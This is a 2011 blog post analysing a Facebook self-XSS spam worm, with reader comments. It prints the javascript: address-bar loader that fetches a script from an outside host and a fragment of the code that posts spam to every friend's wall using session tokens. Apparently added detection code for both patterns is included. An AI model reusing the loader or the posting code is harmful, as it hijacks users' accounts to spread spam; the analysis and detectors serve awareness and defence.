Wednesday, November 9, 2011

New "How Can Rihanna do this" Facebook Spam - Be aware!!




Hello friends. After several days, a new spam has finally come out which floods from wall to wall. This time spammers have found a new way to fool people, take them out of the secure zone and pull the same shit of redirecting them to a URL that contains millions of viruses and malware waiting to welcome you. I alone found 36 different classes of malware uploaded on the infected link. Let us dig deeper into this spam. Let's have some real fun. But do it at your own risk.



A special note for all Rihanna fans - she did nothing crap in public. So don't just go around and click everything on Facebook.

The spam is again a wall flooder and it flows from wall to wall covering everyone in the friend list of the person who clicks it.

Let us check the spam closely. Once you click the link, you will be redirected to a page that asks you to click on a flash screen to verify that you are 18+ (well, I don't think 18+ people are really interested in Rihanna). Once you click it, you will be presented with a 3-step process: click the address bar, then press 'J', and then hit Enter.


Here lies the trap. On pressing 'J', the "mouseonFocus=true" immediately copies a javascript into your address bar. The js looks something like this:
javascript:(a=(b=document).createElement('script')).src='http://reallyshocked.us/verify.js',b.body.appendChild(a);void(0)

This javascript carries no payload of its own; it only links to an external script that does all the work. Since Facebook will prevent any malicious activity within its platform, the real code is hosted outside it, and once you run this js link the external script gets executed and affects your wall. As a result you will paint your wall and your friends' walls with a cool Rihanna spam.
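A defensive check for the address-bar one-liner quoted above, as an added example that is not part of the original post: it flags input that is a `javascript:` URI which creates a script element and points it at a remote host. The function name, the returned field names and the two `example.test` inputs are constructed for illustration.

```javascript
// Added example (not from the original post): flag address-bar input that is
// a javascript: URI pulling in a remote <script>, the pattern quoted above.
function inspectAddressBarInput(text) {
  // Browsers ignore leading whitespace and tab/newline characters in a URL,
  // and the scheme is case-insensitive, so normalise before matching.
  const cleaned = text.replace(/[\t\r\n]/g, '').trim();
  const m = /^javascript:/i.exec(cleaned);
  if (!m) return { javascriptUri: false, injectsScript: false, remoteHosts: [] };

  // The body may be percent-encoded; decode once, tolerate malformed escapes.
  let body = cleaned.slice(m[0].length);
  try { body = decodeURIComponent(body); } catch (e) { /* keep raw body */ }

  // Script-loader markers: a script element is created and given a src.
  const createsScript = /createElement\s*\(\s*['"]script['"]\s*\)/i.test(body);
  const setsSrc = /\.src\s*=/.test(body);

  // Collect every absolute http(s) URL in the body and keep its host.
  const hosts = new Set();
  for (const u of body.match(/https?:\/\/[^\s'"<>)]+/gi) || []) {
    try { hosts.add(new URL(u).hostname.toLowerCase()); } catch (e) { /* skip */ }
  }
  return {
    javascriptUri: true,
    injectsScript: createsScript && setsSrc,
    remoteHosts: [...hosts],
  };
}

// Inputs: the one-liner quoted in the post, a constructed encoded variant,
// and a constructed benign URL.
const fromPost = "javascript:(a=(b=document).createElement('script')).src='http://reallyshocked.us/verify.js',b.body.appendChild(a);void(0)";
const variant = "  JaVaScRiPt:(a%3Ddocument.createElement(%22script%22)).src%3D'https://cdn.example.test/x.js'";
const benign = "https://www.example.test/photos?id=1";
```

The host list gives a responder the external domain to block or look up without ever executing the one-liner.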

A random math function starts picking up values and appends them to the URL to add different session ids to every post, so that Facebook doesn't consider it spam. Well, how did I find all this? Here is the answer: analyse the link that gets added to your address bar as soon as you press 'J'. There is a link to an external js file. You can view the malicious js code by clicking here - code. (Don't worry, it's harmless clicking here.)
For all those Rihanna fans who are afraid of clicking there, the following lines of code explain the whole process of extracting users from your friend list and posting on their walls:


for (var i = 0; i < friends['length']; i++) {
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/profile/composer.php?__a=1';
    var paramswp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u2qr0v_15&xhpc_targetid=' + friends[i]['uid'] + '&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=Oh%20my%20god%2Ccheck%20this&xhpc_message=Oh%20my%20god%2Ccheck%20this&aktion=post&app_id=2309869772&attachment[params][0]=297811423571011&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320585896&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=' + user_id + '&';
    httpwp['open']('POST', urlwp, true);


The first line itself shows a for loop which is as big as your friends list (by god, I loved this).
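Seen from the defender's side, that loop shows up as one account sending the same message to many different walls within seconds. The following is an added example, not code from the original post, that looks for this fan-out in proxy-log records; the parameter names are taken from the quoted request body, while the record shape, the thresholds and all ids are constructed.

```javascript
// Added example: detect the one-message-to-many-walls burst in proxy logs.
// Parameter names come from the quoted request body; the record shape
// {ts, method, path, body} and all ids below are constructed.
function findWallFlood(records, minTargets = 3, windowSec = 10) {
  const groups = new Map(); // JSON [user, message] -> [{ts, target}]
  for (const r of records) {
    if (r.method !== 'POST') continue;
    if (!r.path.startsWith('/ajax/profile/composer.php')) continue;
    const p = new URLSearchParams(r.body); // also percent-decodes values
    const user = p.get('__user');
    const target = p.get('xhpc_targetid');
    const message = p.get('xhpc_message_text');
    if (!user || !target || message === null) continue;
    const key = JSON.stringify([user, message]);
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push({ ts: r.ts, target });
  }
  const alerts = [];
  for (const [key, posts] of groups) {
    posts.sort((a, b) => a.ts - b.ts);
    let best = 0; // most distinct walls hit inside any windowSec span
    for (let i = 0; i < posts.length; i++) {
      const seen = new Set();
      for (let j = i; j < posts.length && posts[j].ts - posts[i].ts <= windowSec; j++) {
        seen.add(posts[j].target);
      }
      best = Math.max(best, seen.size);
    }
    if (best >= minTargets) {
      const [user, message] = JSON.parse(key);
      alerts.push({ user, message, distinctTargets: best });
    }
  }
  return alerts;
}

const mk = (ts, user, target, msg) => ({
  ts, method: 'POST', path: '/ajax/profile/composer.php?__a=1',
  body: 'xhpc_targetid=' + target + '&xhpc_message_text=' +
        encodeURIComponent(msg) + '&__user=' + user,
});
const sampleLog = [
  mk(100, '1001', '2001', 'Oh my god,check this'),
  mk(100, '1001', '2002', 'Oh my god,check this'),
  mk(101, '1001', '2003', 'Oh my god,check this'),
  mk(101, '1001', '2004', 'Oh my god,check this'),
  mk(100, '1002', '2001', 'Happy birthday!'),
  mk(400, '1002', '2005', 'See you tonight'),
];
```

Grouping on the sender and the message text, rather than on the full request body, keeps the match stable when other fields differ from post to post.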


Well, the story doesn't end here. Once you are done with "like this page" (some people have like-o-phobia) and all the other stuff, you will be redirected to a virus and malware heaven. I don't know how many malware and viruses are located at the link to which this application redirects us. My IDS almost died notifying me about it. The redirection URL is reallyshocked.us/ . Don't dare to open it (I am sure your system will be dead without protection). This is a maliciously crafted URL which contains tons of malware. I loved analysing each of them but soon got bored, as I have a very important task to finish by tonight. In case you want to analyse it, just install SNORT and then open this URL. It will capture all the malware activity and can provide you links to some porn and job search websites (what a combination).
Quite an effort put up by spammers this time to flood Facebook. Hope Facebook blocks this application soon. Hope you enjoyed reading it. Sorry to Rihanna fans, as she did nothing CRAP.
Feel free to add your comments.


DARKLORD!!




8 comments:

  1. So I was spammed by this site too. And then I immediately realized my mistake and exited the page, went back to my wall to find people I have accidentally spammed through the recent activities on my wall. But as I was doing this, my wallposts disappeared, all of them. I'm sure they're still there somewhere, just hidden from my wall because I can still look at my old pictures and notes, but on my wall it just says 'No older posts'. Can you please please help me out?

  2. Abhinav.. thanks for the information.. Could you write an article on BURP SUITE??
    I have problems with that.. :)

  3. Actually Facebook has taken action against this spam, so they are deleting it from their platform and from all the walls where this has been posted. So if the spam has disappeared then don't worry.. These are precautionary steps taken by Facebook.. If it's removed then no need to worry, and keep in mind for the future that such spams are common on Facebook.

  4. So, if someone encounters this spam, how could he fix it?

  5. @pamm : the spam will automatically be deleted by Facebook once they recognize it.. Else you can manually delete all the spams that got accidentally posted on your friends' walls..
